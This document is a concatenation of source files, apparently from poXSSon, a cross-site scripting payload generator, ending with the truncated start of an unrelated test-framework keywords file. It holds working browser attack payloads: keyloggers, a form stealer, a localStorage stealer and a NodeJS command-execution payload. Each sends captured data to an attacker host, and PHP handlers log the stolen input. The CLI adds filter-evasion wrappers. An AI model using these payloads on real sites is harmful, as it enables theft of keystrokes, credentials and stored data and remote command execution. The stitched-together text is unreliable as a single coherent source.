        if option_name.lower() not in joined_cli:
            result = result.replace(option_name.upper(), default_value)
    return result
def arguments():
    """Build and parse the poxsson command line.

    Returns the argparse namespace; payload options are collected as
    free-form NAME=value positionals in OPTIONS.
    """
    parser = argparse.ArgumentParser(prog="poxsson")
    # Group for the wrapping/obfuscation flags (purely cosmetic in --help).
    wrapping = parser.add_argument_group()
    #wrapping_group = wrapping.add_mutually_exclusive_group()
    parser.add_argument('OPTIONS', nargs="*", help="Specify the payload's options") #nargs means that 0 or mor arguments of this type can be passed
    parser.add_argument('-l', '--list', action='store_true', dest='LIST_PAYLOADS', help='List available payloads')
    parser.add_argument('-p', '--payload', action='store', dest='PAYLOAD', metavar='<payload>', help='Specify the payload')
    parser.add_argument('-v', '--verbose', action='store_true', dest='VERBOSE', help='Increase verbosity')
    parser.add_argument('-i', '--info', action='store_true', dest='INFO', help='Show payload info')
    parser.add_argument('-n', '--null', action='store_true', dest='NULL_INSERT', help='Perform null ("%%00") insertion for evasion')
    parser.add_argument('-c', '--clip', action='store_true', dest='CLIP', help='Copy payload to clipboard')
    parser.add_argument('-o', '--output', action='store', dest='OUTPUT', metavar='<file>', help='Save payload to a file')
    parser.add_argument('-d', '--delay', action='store', dest='DELAY', metavar='<n[s|m|h]>', help='Execute payload after specific period of time (seconds, minutes, hours)')
    parser.add_argument('-e', '--encode', action='store', choices=['base64', 'utf8'], dest='ENCODE', metavar='<encoding>', help='Encode payload')
    parser.add_argument('-s', '--separator', action='store', choices=['slash', 'newline', 'tab', 'carriage', 'random'], dest='SEPARATOR', metavar='<sep>', help="Use specific (or random) separator between tag and first parameter")
    #Separate group for executable wrappers (it just looks more clear imho)
    wrapping.add_argument('--random-max', action='store', dest='RANDOM_MAX', help="Maximum length of the random payload")
    wrapping.add_argument('--tag', action='store_true', dest='TAG', help="Wrap payload with basic <script> tags")
    wrapping.add_argument('--tag-random', action='store_true', dest='TAG_RANDOM', help="Wrap payload with random <script> tags")
    wrapping.add_argument('--tag-different', action='store_true', dest='TAG_RANDOM_DIFFERENT', help="When combined with above option, generates different start and end tags")
    wrapping.add_argument('--tag-closer', action='store_true', dest='TAG_CLOSER', help="Use '//' instead of '>' for closing tags")
    wrapping.add_argument('--polyglot', action='store', dest='POLYGLOT', metavar="<id>", help="Wrap payload with selected or random polyglot wrapper")
    wrapping.add_argument('--polyglot-trigger', action='store', dest='POLYGLOT_TRIGGER', help="Wrap payload with polyglot wrapper")
    wrapping.add_argument('--cookie', action='store_true', dest='COOKIE', help="Use cookie shortener to reduce payload's size and detection probability")
    wrapping.add_argument('--confirm', action='store_true', dest='CONFIRM', help="Replace alert() popups with less detectable confirm()")
    wrapping.add_argument('--oneliner', action='store_true', dest='ONELINER', help="Convert generated payload to one-liner")
    wrapping.add_argument('--bookmarklet', action='store_true', dest='BOOKMARKLET', help="Convert generated payload to a bookmarklet")
    wrapping.add_argument('--handler', action='store_true', dest='HANDLER', help="Start handler after payload generation")
    wrapping.add_argument('--replace-http', action='store_true', dest='REPLACE_HTTP', help="Replace 'http[s]://' with a random substitute")
    wrapping.add_argument('--jquery', action='store_true', dest='JQUERY', help="Load JQuery before running the payload")
    wrapping.add_argument('--v2', action='store_true', dest='VUE_2', help="Embedd payload inside VueJS v2 template source")
    wrapping.add_argument('--v3', action='store_true', dest='VUE_3', help="Embedd payload inside VueJS v2 template source")
    wrapping.add_argument('--angular', action='store_true', dest='ANGULAR', help="Embedd payload inside AngularJS template source")
    #parser.add_argument('--replacei-chars', action='store', choices=['html', 'octal', 'url', 'iso', 'hex', 'numeric'], dest='REPLACE',
    #                     help="Replace all special characters with their equivalents of selected type")
    return parser.parse_args()
def main():
    """Parse CLI flags, generate the selected XSS payload and post-process it."""
    res = arguments()
    if res.LIST_PAYLOADS:
        list_payloads()
        sys.exit()
    try:
        # Each payload is a Python module under payloads/.
        loaded_payload = importlib.import_module(f"payloads.{res.PAYLOAD}")
    except ImportError:
        print(bad("No such payload"))
        sys.exit()
    js_code = loaded_payload.payload
    if res.RANDOM_MAX:
        # Draw random one-liners until one fits under the length cap.
        if res.PAYLOAD == "random":
            selected_payload = random.choice(open("random_payloads.txt", "r+").readlines())
            while len(selected_payload) >= int(res.RANDOM_MAX):
                selected_payload = random.choice(open("random_payloads.txt", "r+").readlines())
        if res.PAYLOAD == "confirm":
            selected_payload = random.choice(open("random_confirm_payloads.txt", "r+").readlines())
            while len(selected_payload) >= int(res.RANDOM_MAX):
                selected_payload = random.choice(open("random_confirm_payloads.txt", "r+").readlines())
        # NOTE(review): selected_payload is never assigned back to js_code --
        # the --random-max result is currently discarded; confirm wiring.
    js_code = insert_options(js_code, loaded_payload.options, res.OPTIONS)
    if res.DELAY:
        # Expand the s/m/h suffix into milliseconds for setTimeout().
        time_shorts = {'s': 1000, 'm': 60000, 'h': 3600000}
        if isinstance(res.DELAY, int):
            delay_in_miliseconds = int(res.DELAY)
        else:
            if res.DELAY[-1] not in ['s', 'm', 'h']:
                print(err("Wrong delay format"))
                sys.exit()
            delay_in_miliseconds = int(res.DELAY[0:-1]) * time_shorts[res.DELAY[-1]]
        # Bug fix: literal braces in an f-string must be doubled ({{ }}),
        # otherwise the JS function body is parsed as a replacement field.
        js_code = f"""setTimeout(function() {{
    {js_code}
    }}, {delay_in_miliseconds})"""
    if res.JQUERY:
        js_code = f"""<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js">{js_code}"""
    if res.INFO:
        print_payload_info(loaded_payload)
        sys.exit()  # show details and stop
    if res.ONELINER:
        js_code = js_code.replace("\n", "")  # collapse to a one-liner
    if res.BOOKMARKLET:
        js_code = "javascript:(function(){" + js_code.replace("\n", "") + "})();"
    if res.NULL_INSERT:
        # NOTE(review): null insertion is not implemented yet -- it should
        # insert "%00" at random positions for filter evasion.
        null_char = "%00"
        payload_len = len(js_code)
        start_position = random.randrange(payload_len)
    if res.REPLACE_HTTP:
        # The scheme can usually be omitted in payloads; use the
        # protocol-relative "//" form.
        # NOTE(review): a random substitute was computed but never used in
        # the original -- kept deterministic here; confirm intended.
        js_code = js_code.replace("http://", "//")
        js_code = js_code.replace("https://", "//")
    if res.ENCODE:
        if res.ENCODE == "base64":
            # Bug fix: b64encode returns bytes; decode so the payload does
            # not embed a Python "b'...'" repr.
            encoded = base64.b64encode(js_code.encode("utf-8")).decode("ascii")
            js_code = f"""eval(decode64('{encoded}'))"""
        elif res.ENCODE == "utf8":
            js_code = js_code.encode("utf-8")
        else:
            # Bug fix: 'logs' was undefined; print via huepy like elsewhere.
            print(err("No such encoding"))
            sys.exit()
    if res.POLYGLOT:
        # Polyglot wrappers make the payload fire in multiple contexts.
        # Bug fix: the branches were inverted -- "random" must pick a random
        # wrapper; any other value selects one by id.
        if res.POLYGLOT == "random":
            plg = random.choice(list(polyglots.values()))
        else:
            plg = polyglots[res.POLYGLOT]
        # Bug fix: guard against a missing --polyglot-trigger (was a
        # TypeError when replacing with None).
        trigger = res.POLYGLOT_TRIGGER or "onload"
        js_code = plg.replace("PAYLOAD", js_code).replace("TRIGGER", trigger)
    if res.TAG:
        js_code_non_tagged = js_code
        js_code = f"<script>{js_code}</script>"
    if res.COOKIE:
        js_code = js_code.replace("document.cookie", "cookie")
        js_code_non_tagged = js_code
    if res.SEPARATOR:
        separators = {
            "slash": "/",
            "newline": "\n",
            "tab": "\t",
            "carriage": '0x3c'
        }

        def select_separator():
            if res.SEPARATOR == "random":
                return random.choice(list(separators.values()))
            return separators[res.SEPARATOR]

        # Bug fix: the original referenced an undefined name ('bs'); extract
        # the HTML tag names with a regex instead of BeautifulSoup.
        for tag_name in set(re.findall(r"</?\s*([a-zA-Z][a-zA-Z0-9]*)", js_code)):
            js_code = js_code.replace(tag_name, tag_name + select_separator())
        js_code_non_tagged = js_code
    if res.TAG_RANDOM:
        # Tag-case obfuscation (e.g. <script> => <ScRiPt>).
        if res.TAG:
            js_code = js_code_non_tagged
        script_tag = "".join(random.choice([c.upper(), c]) for c in "script")
        end_tag = script_tag
        if res.TAG_RANDOM_DIFFERENT:
            end_tag = "".join(random.choice([c.upper(), c]) for c in script_tag)
        js_code = f"<{script_tag}>{js_code}</{end_tag}>"
    if res.TAG_CLOSER:
        js_code = js_code.replace(">", "//")
    if res.CONFIRM:
        js_code = js_code.replace("alert", "confirm")
    if res.VUE_2:
        js_code = f"{{constructor.constructor('{js_code}')()}}"
    if res.VUE_3:
        js_code = f"{{_openBlock.constructor('{js_code}')()}}"
    if res.ANGULAR:
        js_code = f"{{constructor.constructor('{js_code}')()}}"
    if res.CLIP:
        # Copy the payload to the system clipboard (paste with Ctrl-V).
        pyperclip.copy(js_code)
    if res.OUTPUT:
        with open(res.OUTPUT, "w+") as payload_file:
            payload_file.write(js_code)
        if res.VERBOSE:
            print(info(f"Saved payload as {res.OUTPUT}"))
    print(info(f"Payload length: {len(js_code)}"))
    print(good("Generated payload:"))
    print("")
    print(blue(js_code))
    if res.HANDLER:
        try:
            # Start the payload-specific PHP handler with its options filled.
            handler_code = loaded_payload.handler
            handler_code = insert_options(handler_code, loaded_payload.handler_options, res.OPTIONS)
            print(info("Started handler"))
            start_php_handler(handler_code)
        except AttributeError:
            print(err("This module does not have a handler"))
#Btw, if you know JS, you can easily write you own, custom payloads.
#Each payload is a separate Python module. Here are possible variables:
# .payload - the actual code of the payload. Upper-case words (ex. CMD, LHOST) are later replaced as options names
# .[handler_]options - two-dimensional, single element list. Option entry looks like this: [<name>, <description>, <default_value>]
# .handler - custom, payload-specific PHP handler.
if __name__ == "__main__":
    print_banner()
    try:
        main()
    except KeyboardInterrupt:
        # Graceful exit on Ctrl-C (e.g. while the PHP handler is serving).
        print("")
        print(info("Exiting"))
|
redcode-labs/poXSSon | lib/handler.py | <gh_stars>10-100
#!/usr/bin/python3.7
from http.server import HTTPServer, BaseHTTPRequestHandler
class DefaultHandler(BaseHTTPRequestHandler):
    """Minimal request handler that logs the requested path to stdout.

    NOTE(review): no HTTP response is ever sent back -- clients will see
    the connection close without a status line; confirm this is intended.
    """
    def do_GET(self):
        print(self.path)
        #self.send_response(200)
        #self.end_headers()
        #self.wfile.write(b'Hello, world!')
def start_handler(port, log, outfile):
    """Start a blocking HTTP server on localhost:*port* using DefaultHandler.

    The *log* and *outfile* parameters are accepted for interface
    compatibility but are not used yet.
    """
    # Bug fix: the original referenced the undefined SimpleHTTPRequestHandler
    # and ignored the port argument (hardcoded 8000).
    httpd = HTTPServer(('localhost', port), DefaultHandler)
    httpd.serve_forever()
|
redcode-labs/poXSSon | payloads/alert.py | #!/usr/bin/python3.7
# Payload metadata consumed by poxsson.py (see the footer notes there):
# name/description identify the module; options is [[name, description, default]].
name="alert"
description="Print alert message"
options=[["MESSAGE", "Alert message to print", "alert!"]]
# MESSAGE is substituted by insert_options() before delivery.
payload = """
alert('MESSAGE')
"""
|
redcode-labs/poXSSon | payloads/info.py | #!/usr/bin/python3.7
import socket
def local_ip():
    """Best-effort detection of this machine's primary IPv4 address.

    Connecting a UDP socket sends no packets; it only resolves the outgoing
    interface. Returns "N/A" when no route/interface is available.
    """
    try:
        # Bug fix: use a context manager so the socket is always closed
        # instead of being leaked.
        with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
            s.connect(("8.8.8.8", 80))
            return s.getsockname()[0]
    except OSError:
        return "N/A"
# Payload metadata consumed by poxsson.py.
name="info"
description="Retrieve information about the application that launched the script"
# LHOST defaults to this machine's address (see local_ip above).
options = [["LHOST", "Host to send captured strokes to", local_ip()]]
handler_options = [["LOGFILE", "File to store logged data", "storage_dump.txt"]]
# Candidate navigator.* properties that could be exfiltrated.
# NOTE(review): the payload body below is empty and this list is not
# referenced anywhere -- the module appears to be a work in progress.
navigator_attributes = [
    "navigator.appCodeName",
    "navigator.appName",
    "navigator.appVersion",
    "navigator.buildID",
    "navigator.cookieEnabled",
    "navigator.language",
    "navigator.mimeTypes",
    "navigator.onLine",
    "navigator.oscpu",
    "navigator.platform",
    "navigator.plugins",
    "navigator.product",
    "navigator.productSub",
    "navigator.securityPolicy",
    "navigator.userAgent",
    "navigator.vendor",
    "navigator.vendorSub",
]
payload = """
"""
|
redcode-labs/poXSSon | payloads/shortest.py | #!/usr/bin/python3
# Payload metadata consumed by poxsson.py.
name="shortest"
description="The shortest payload for XSS injection"
# Loads and executes an external script from the 14.rs shortener domain.
payload = "<script src=//14.rs>"
redcode-labs/poXSSon | payloads/img_replace.py | <reponame>redcode-labs/poXSSon<filename>payloads/img_replace.py
#!/usr/bin/python3.7
# Payload metadata consumed by poxsson.py.
name="img_replace"
description="Replace all images on site with an image pointed to by URL"
# [[name, description, default]] -- URL has no default and must be supplied.
options = [["URL", "URL of the new image", ""]]
# Rewrites the src of every <img> element in the document to URL.
payload = """
var imgs = document.getElementsByTagName("img");
for(var i=0, l=imgs.length; i<l; i++) {
imgs[i].src = "URL";
}
"""
|
redcode-labs/poXSSon | payloads/hide.py | <filename>payloads/hide.py
#!/usr/bin/python3.7
# Payload metadata consumed by poxsson.py.
name="hide"
description="Hides specified element on the page"
options = [['ELEMENT_ID', "ID of the element to hide", ""]]
# Sets display:none on the element whose id is ELEMENT_ID.
payload = """
var p = document.getElementById('ELEMENT_ID');
p.style.display = 'none';
"""
|
redcode-labs/poXSSon | payloads/random_confirm.py | #!/usr/bin/python3
import random
# Payload metadata consumed by poxsson.py.
name="random_confirm"
description="Chooses a random one-liner 'confirm()' payload. An alternative to standard 'alert()'"
# NOTE(review): an empty inner entry -- confirm whether options should be [].
options = [[]]
# Picked once at import time; the chosen line keeps its trailing newline and
# the file path is resolved against the current working directory -- TODO confirm.
payload = random.choice(open('random_confirm_payloads.txt').readlines())
|
redcode-labs/poXSSon | payloads/add_script.py | <reponame>redcode-labs/poXSSon
#!/usr/bin/python3.7
# Payload metadata consumed by poxsson.py.
name="add_script"
description="Append external script to the top of the 'head' tag of the site as child element"
options = [['URL', "URL of the external script", ""]]
# Creates a <script src=URL> element and attaches it to <head>.
payload = """
var script=document.createElement('script');
script.type='text/javascript';
script.src='URL';
document.getElementsByTagName('head')[0].appendChild(script);
"""
|
redcode-labs/poXSSon | payloads/session_keylogger.py | <filename>payloads/session_keylogger.py
#!/usr/bin/python3.7
import socket
def local_ip():
    """Best-effort lookup of this machine's outbound IPv4 address.

    Connecting a UDP socket sends no packets; it only asks the OS which
    local address would be used to reach the given peer.

    Returns:
        str: the local IP address, or "N/A" when it cannot be determined.
    """
    try:
        # Context manager guarantees the socket is closed (original leaked it).
        with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
            s.connect(("8.8.8.8", 80))
            return s.getsockname()[0]
    except OSError:
        # Catch only socket errors, not a bare 'except' that would also
        # swallow KeyboardInterrupt/SystemExit.
        return "N/A"
# Payload metadata consumed by the poXSSon framework.
name="session_keylogger"
description="A keylogger which follows user sessions thanks to an ID set into a cookie"
# Placeholders (LHOST, INTERVAL, TRACK_*, COOKIE_*) are substituted into the
# JS payload template by the framework.
options = [["LHOST", "Host to send captured strokes to", local_ip()],
           ["INTERVAL", "Number of seconds after which captured keystrokes are sent", "10"],
           ["TRACK_KEYS", "Track keystrokes", "true"],
           ["TRACK_MOUSE", "Track mouse movement", "false"],
           ["TRACK_CLICKS", "Track mouse clicks", "false"],
           ["COOKIE_NAME", "Name of the cookie shown in the browser", "cook"],
           ["COOKIE_LIFETIME", "Lifetime of cookie in days", "1"]]
# LOGFILE is substituted into the PHP handler template.
handler_options = [["LOGFILE", "File to store logged data", "session_klog.txt"]]
payload = """
function Keylogger(){
//Bufers
/*
* Configuration of the keylogger
******
* track_keys : True if one wants to track the key pressed
* track_mouse : True if one wants to track the movements of mouse
* track_clicks : true if one wants to track the click
* send_interval_s : interval to send the request to the server (in second)
* distant_server : address of the server
* cookie_name : Name of the cookie in the browser
* cookie_lifetime : Lifetime of the cookie in days
*/
this.keylog_configuration={
track_keys: TRACK_KEYS,
track_mouse: TRACK_MOUSE,
track_clicks: TRACK_CLICKS,
send_interval_s: INTERVAL,
distant_server:'http://LHOST:8000/handler.php',
cookie_name:'COOKIE_NAME',
cookie_lifetime: COOKIE_LIFETIME
};
/*
* Function that generates a GUID (but not a strong one)
*/
this.S4=function() {
return (((1+Math.random())*0x10000)|0).toString(16).substring(1);
};
/*
* Constructor-like function
* Initialize elements to the right values
*/
this.begin=function(){
var guid_in_cookies;
var i,x,y,ARRcookies=document.cookie.split(";");
for (i=0;i<ARRcookies.length;i++)
{
x=ARRcookies[i].substr(0,ARRcookies[i].indexOf("="));
y=ARRcookies[i].substr(ARRcookies[i].indexOf("=")+1);
x=x.replace(/^\s+|\s+$/g,"");
if (x==this.keylog_configuration.cookie_name)
{
guid_in_cookies= unescape(y);
}
}
if(guid_in_cookies!=null && guid_in_cookies.length >0){
this.guid=guid_in_cookies;
}
else{
/* Create the GUID */
this.guid= (this.S4()+this.S4()+"-"+this.S4()+"-"+
this.S4()+"-"+this.S4()+"-"+this.S4()+
this.S4()+this.S4());
/* Cookie setup*/
var exdate = new Date();
var exdays = this.keylog_configuration.cookie_lifetime;
exdate.setDate(exdate.getDate() +exdays );
var c_value=escape(this.guid) + ((exdays==null) ? "" : "; expires="+exdate.toUTCString());
document.cookie=this.keylog_configuration.cookie_name + "=" + c_value;
}
this.from_page=encodeURIComponent(window.location.href);
this.transfer_buffer();
//alert("Method had been called" + this.property1);
};
/*
* Insert a key
*/
this.insert_key=function(event){
var new_char='';
if(event.altKey){
new_char = '{{Alt}}';
}else if(event.ctrlKey){
new_char = '{{Ctrl}}';
}else if(event.shiftKey){
new_char = '{{Shift}}';
}
if(event.keyCode!=null){
if(event.keyCode){
new_char=new_char+this.decodeChar(event.keyCode);
}else{
new_char=new_char+this.decodeChar(event.charCode);
}
}
this.buffer_text_current=this.buffer_text_current+new_char;
};
/*
* Decode special characters.
*/
this.decodeChar=function(code){
var charac;
switch(code){
case 8:
charac='{{Backspace}}';
break;
case 9:
charac='{{Tab}}';
break;
case 13:
charac='{{Enter}}';
break;
case 33:
break;
case 37:
charac='{{<-}}';
break;
case 38:
charac='{{up}}';
break;
case 39:
charac='{{->}}';
break;
case 40:
charac='{{down}}';
break;
case 46:
charac='{{delete}}';
break;
case 91:
charac='{{leftWindow}}';
break;
case 92:
charac='{{rightWindow}}';
break;
case 154:
charac='{{PrtScreen}}';
break;
default:
charac=String.fromCharCode(code);
break;
}
return charac;
};
/*
*
*/
this.insert_click=function(event){
// Nothing at the moment
};
/*
*
*/
this.send_infos=function(){
var parameters='?frompage='+this.from_page;
parameters =parameters + '&guid='+this.guid;
parameters = parameters + '&text='+encodeURIComponent(this.buffer_text_to_send);
var address_to_call=this.keylog_configuration.distant_server+parameters;
//We just preload the image without actually inserting it
image01= new Image();
image01.src=address_to_call;
};
/*
* Swap values
*/
this.transfer_buffer=function(){
this.buffer_text_to_send=this.buffer_text_current;
this.buffer_text_current='';
this.send_infos();
var t = setTimeout('logger.transfer_buffer()',this.keylog_configuration.send_interval_s*1000);
};
this.buffer_text_current='[Begin session]',
this.buffer_text_to_send='',
//Important information
this.guid='UNDEFINED',
this.from_page='UNDEFINED';
}
var logger = new Keylogger();
/*
* Launch the logger
*/
function launch(){
logger.begin();
//binding for key pressed
if(logger.keylog_configuration.track_keys){
if (navigator.appName == 'Microsoft Internet Explorer')
{
document.body.attachEvent('onkeypress',process_key);
}else{
//Binding for everything but ie
document.addEventListener('keypress',process_key,false);
//document.body.setAttribute('onKeyPress','Keylogger.insert_key(event)');
}
}
//Binding for click
if(logger.keylog_configuration.track_clicks){
//Binding for everything but ie
//document.body.setAttribute('onclick','Keylogger.insert_click(event)');
}
}
function process_key(event){
logger.insert_key(event);
}"""
# PHP handler served at http://LHOST:8000/handler.php. It logs the GET
# parameters sent by the JS payload and answers with a 1x1 transparent PNG so
# the request (loaded via an Image() src) looks like a normal image fetch.
# Fix: the $log_string assignment was missing its terminating semicolon,
# which made the whole handler a PHP parse error.
handler = """
<?php
/*
 * Create a 1 by 1 image with transparent background( if the browser is suspicious of call to non image)
 */
function create_fake_image(){
    header('content-type:image/png');
    // One by one pixel
    $im = imagecreatetruecolor(1, 1);
    $background_black = imagecolorallocate($im, 0, 0, 0);
    imagecolortransparent($im,$background_black);
    imagePNG($im);
}
?>
<?php
if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
    $ip = $_SERVER['HTTP_CLIENT_IP'];
} elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
    $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
} else {
    $ip = $_SERVER['REMOTE_ADDR'];
}
$text=$_GET['text'];
$guid=$_GET['guid'];
$source_page=$_GET['frompage'];
$log_string = "\n[*]Source ip: %s (GUID: %s)\n[*]Source page: %s\n[*] Captured data: %s\n\n";
$f=fopen("LOGFILE","a+");
fwrite($f, sprintf($log_string, $ip, $guid, $source_page, $text));
fclose($f);
create_fake_image();
?>"""
|
redcode-labs/poXSSon | payloads/form_stealer.py | <filename>payloads/form_stealer.py
#!/usr/bin/python3.7
import socket
def local_ip():
    """Best-effort lookup of this machine's outbound IPv4 address.

    Connecting a UDP socket sends no packets; it only asks the OS which
    local address would be used to reach the given peer.

    Returns:
        str: the local IP address, or "N/A" when it cannot be determined.
    """
    try:
        # Context manager guarantees the socket is closed (original leaked it).
        with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
            s.connect(("8.8.8.8", 80))
            return s.getsockname()[0]
    except OSError:
        # Catch only socket errors, not a bare 'except' that would also
        # swallow KeyboardInterrupt/SystemExit.
        return "N/A"
name="form_stealer"
description="Steals all the values set in forms and sends them away through an image src"
options = [["LHOST", "Host to send captured strokes to", local_ip()]]
handler_options = [["LOGFILE", "File to store logged data", "session_klog.txt"]]
payload = """
document.getElementsByTagName("body")[0].setAttribute("onunload","postData()");
function postData() {
var output = "page="+document.location;
var inputs, index;
inputs = document.getElementsByTagName('input');
for (index = 0; index < inputs.length; ++index) {
input_name = inputs[index].id || inputs[index].name;
output = output + "&" + input_name + "=" + inputs[index].value;
}
output = encodeURI(output);
new Image().src = "http://LHOST:8000/handler.php?"+output;
}"""
# PHP handler for the exfiltrated form data: logs the source page plus every
# submitted input name/value pair to LOGFILE.
# Fixes: the original wrote $form_line even for the "page" key (stale or
# undefined variable on that iteration) and reopened the log file on every
# loop pass; the file is now opened once and "page" is skipped explicitly.
handler = """
<?php
if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
    $ip = $_SERVER['HTTP_CLIENT_IP'];
} elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
    $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
} else {
    $ip = $_SERVER['REMOTE_ADDR'];
}
$header_line = sprintf("\n[*] %s (host: %s)", $_GET["page"], $ip);
$f=fopen("LOGFILE","a+");
fwrite($f, $header_line);
foreach($_GET as $key => $value){
    if ($key == "page"){
        continue;
    }
    $form_line = sprintf("\nName: %s Value: %s", $key, $value);
    fwrite($f, $form_line);
}
fclose($f);
?>
"""
|
redcode-labs/poXSSon | payloads/random.py | #!/usr/bin/python3
import random
# Payload metadata consumed by the poXSSon framework.
name="random"
description="Chooses a random one-liner payload for blind testing backend's input validation"
# No configurable options for this payload.
options = [[]]
# Pick one payload line at random at import time. The 'with' block closes the
# file handle, which the original left open.
# NOTE(review): the path is resolved relative to the current working directory.
with open('random_payloads.txt') as payload_file:
    payload = random.choice(payload_file.readlines())
|
redcode-labs/poXSSon | payloads/link_replace.py | <filename>payloads/link_replace.py
#!/usr/bin/python3.7
name="link_replace"
description="Replaces all links on page"
options = [['URL', "URL to replace the links with", "http://example.com"]]
payload = """
Array.from(document.getElementsByTagName("a")).forEach(function(i) {
i.href = "URL";
});
"""
|
redcode-labs/poXSSon | payloads/storage.py | <gh_stars>10-100
#!/usr/bin/python3.7
import socket
def local_ip():
    """Best-effort lookup of this machine's outbound IPv4 address.

    Connecting a UDP socket sends no packets; it only asks the OS which
    local address would be used to reach the given peer.

    Returns:
        str: the local IP address, or "N/A" when it cannot be determined.
    """
    try:
        # Context manager guarantees the socket is closed (original leaked it).
        with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
            s.connect(("8.8.8.8", 80))
            return s.getsockname()[0]
    except OSError:
        # Catch only socket errors, not a bare 'except' that would also
        # swallow KeyboardInterrupt/SystemExit.
        return "N/A"
name="storage"
description="Retrieves HTML5 local storage and send it away through an image source URL"
options = [["LHOST", "Host to send captured strokes to", local_ip()]]
handler_options = [["LOGFILE", "File to store logged data", "storage_dump.txt"]]
payload = """
if ('localStorage' in window && window['localStorage'] !== null) {
new Image().src = 'http://LHOST:8000/handler.php?localStorage='+JSON.stringify(window['localStorage']);
}
"""
# PHP handler: appends the reporting host and its serialized localStorage
# dump to LOGFILE.
# Fix: the original wrote the undefined variable $storage_dump__line (double
# underscore typo) instead of $storage_dump_line, so nothing was logged.
handler = """
<?php
if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
    $ip = $_SERVER['HTTP_CLIENT_IP'];
} elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
    $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
} else {
    $ip = $_SERVER['REMOTE_ADDR'];
}
$storage_dump_line = sprintf("\n[*] Host: %s \n[*] Storage: %s\n\n", $ip, $_GET['localStorage']);
$f=fopen("LOGFILE","a+");
fwrite($f, $storage_dump_line);
fclose($f);
?>
"""
|
redcode-labs/poXSSon | payloads/cmd_exec.py | #!/usr/bin/python3.7
import socket
def local_ip():
    """Best-effort lookup of this machine's outbound IPv4 address.

    Connecting a UDP socket sends no packets; it only asks the OS which
    local address would be used to reach the given peer.

    Returns:
        str: the local IP address, or "N/A" when it cannot be determined.
    """
    try:
        # Context manager guarantees the socket is closed (original leaked it).
        with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
            s.connect(("8.8.8.8", 80))
            return s.getsockname()[0]
    except OSError:
        # Catch only socket errors, not a bare 'except' that would also
        # swallow KeyboardInterrupt/SystemExit.
        return "N/A"
# Payload metadata consumed by the poXSSon framework.
name="cmd_exec"
description="Executes command using NodeJS's execSync function"
# LHOST/CMD placeholders are substituted into the templates by the framework.
options = [["LHOST", "Host with listening handler", local_ip()],
           ["CMD", "Command to execute", "ls"]]
# LOGFILE is substituted into the PHP handler template.
handler_options = [["LOGFILE", "File to store logged data", "cmd_output.txt"]]
# JS payload: runs CMD via Node's execSync and exfiltrates the output as
# query parameters of a fake image request. Only effective where the injected
# script is evaluated by a NodeJS runtime (require must be available).
# Fixes: the second query parameter was joined with '?' instead of '&', and
# raw command output (spaces/newlines) broke the URL — both values are now
# passed through encodeURIComponent.
payload = """
const execSync = require('child_process').execSync;
const output = execSync('CMD', { encoding: 'utf-8' });
const executed_command = 'CMD';
new Image().src = "http://LHOST:8000/handler.php?output="+encodeURIComponent(output)+"&executed_command="+encodeURIComponent(executed_command);
"""
# PHP handler: appends the executed command and its output to LOGFILE.
# Fix: the original was missing the closing parenthesis of the fwrite(...)
# call, a PHP parse error.
handler = """
<?php
$f=fopen("LOGFILE","a+");
fwrite($f, sprintf("\n[*] Command: %s\n[*] Output: %s", $_GET['executed_command'], $_GET['output']));
fclose($f);
?>
"""
|
redcode-labs/poXSSon | payloads/keylogger.py | #!/usr/bin/python3.7
import socket
import http.server
def local_ip():
    """Best-effort lookup of this machine's outbound IPv4 address.

    Connecting a UDP socket sends no packets; it only asks the OS which
    local address would be used to reach the given peer.

    Returns:
        str: the local IP address, or "N/A" when it cannot be determined.
    """
    try:
        # Context manager guarantees the socket is closed (original leaked it).
        with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
            s.connect(("8.8.8.8", 80))
            return s.getsockname()[0]
    except OSError:
        # Catch only socket errors, not a bare 'except' that would also
        # swallow KeyboardInterrupt/SystemExit.
        return "N/A"
name="keylogger"
description="Captures keystrokes and sends them to an external host"
options = [["LHOST", "Host to send captured strokes to", local_ip()],
["INTERVAL", "Number of seconds after which captured keystrokes are sent", "1"]]
handler_options = [["LOGFILE", "File to write keystrokes to", "keystrokes.txt"]]
payload = """
var keys='';
document.onkeypress = function(e) {
get = window.event?event:e;
key = get.keyCode?get.keyCode:get.charCode;
key = String.fromCharCode(key);
keys+=key;
}
window.setInterval(function(){
new Image().src = 'http://LHOST:8000/handler.php?c='+keys;
keys = '';
}, INTERVAL*1000);
"""
# PHP handler: appends each batch of captured keystrokes (the 'c' GET
# parameter) to LOGFILE.
# Fix: removed a stray debug shell_exec("ls") call that executed a shell
# command on every request for no purpose.
handler = """
<?php
if(!empty($_GET['c'])) {
    $f=fopen("LOGFILE","a+");
    fwrite($f,$_GET['c']);
    fclose($f);
}
?>
"""
|
Hanlen520/fasttest | fasttest/keywords/keywords.py | <reponame>Hanlen520/fasttest<gh_stars>10-100
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
def return_keywords(driver):
    """Return the list of DSL keywords supported for *driver*.

    'selenium' drivers receive the common + web keyword set; any other
    driver value receives the common + mobile-app keyword set. The result
    order is unspecified (sets are used to deduplicate).
    """
    # Keywords shared by both the app and web DSL dialects: actions,
    # control flow, assertions, and '$.'-prefixed value getters.
    common_keywords = {
        "click", "check", "sleep", "setVar", "break",
        "$.getText", "$.id", "$.getVar", "$.getElement", "$.getElements",
        "$.getLen", "$.isExist", "$.isNotExist",
        "while", "for", "if", "elif", "else",
        "assert", "setTimeout", "call", "variable",
    }
    # Mobile-only keywords (appium drivers).
    app_keywords = {
        "installApp", "uninstallApp", "launchApp", "closeApp",
        "tap", "doubleTap", "press", "goBack", "adb",
        "swipe", "input", "ifiOS", "ifAndroid",
    }
    # Browser-only keywords (selenium drivers).
    web_keywords = {
